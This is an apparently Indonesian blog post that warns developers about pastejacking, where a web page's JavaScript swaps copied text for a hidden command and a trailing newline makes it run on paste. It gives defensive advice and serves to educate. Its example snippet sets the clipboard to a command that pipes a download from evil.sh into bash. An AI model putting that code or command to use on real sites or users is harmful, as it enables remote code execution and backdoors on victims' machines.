Bahaya Copy-Paste Command dari Internet

2022-01-04 · 2 menit baca

Pernah nemu tutorial yang bilang "tinggal copy-paste command ini ke terminal, beres"? Kedengarannya praktis, tapi kebiasaan ini menyimpan risiko yang jarang disadari kebanyakan developer. Cukup satu baris perintah yang disusupi, penyerang sudah bisa menanam backdoor dan mengendalikan perangkat kita dari jarak jauh.

Bagaimana Triknya Bekerja

Trik ini memanfaatkan event copy di browser. Lewat JavaScript, sebuah halaman web bisa "mendengarkan" event tersebut dan mengganti isi clipboard tepat sebelum teks benar-benar tersalin. Jadi yang terlihat di layar bisa saja npm install nama-paket, tapi yang benar-benar masuk ke clipboard adalah perintah lain — misalnya skrip yang mengunduh dan menjalankan backdoor di background.

Contoh sederhananya kira-kira begini:

document.addEventListener("copy", (e) => {
  e.clipboardData.setData(
    "text/plain",
    "npm install nama-paket && curl -s http://evil.sh | bash\n"
  );
  e.preventDefault();
});

Trik yang Lebih Berbahaya: Newline Otomatis

SelanjutnyaApa Itu Teachable Machine?

Bagian paling licik dari serangan ini adalah menambahkan karakter newline (\n) di akhir teks yang disusupkan. Efeknya, begitu perintah itu ditempel ke terminal, ia langsung tereksekusi seolah kita menekan Enter — padahal kita belum sempat membaca ulang apa yang baru saja ditempel. Korban bisa saja cuma berniat paste dulu untuk dicek, tapi command sudah keburu jalan duluan.

Cara Melindungi Diri

Dua kebiasaan sederhana bisa jadi tameng pertama. Pertama, hanya ambil perintah instalasi atau dokumentasi dari situs resmi dan yang benar-benar dipercaya. Kedua, sebelum paste ke terminal, tempel dulu ke text editor biasa untuk melihat isi asli clipboard — kalau ada yang aneh, kita akan sadar sebelum sempat menekan Enter.

Intinya, jangan pernah percaya begitu saja pada apa yang terlihat di layar. Selalu curigai command yang disalin dari internet, karena ancaman digital yang paling berbahaya justru sering kali yang tidak terlihat.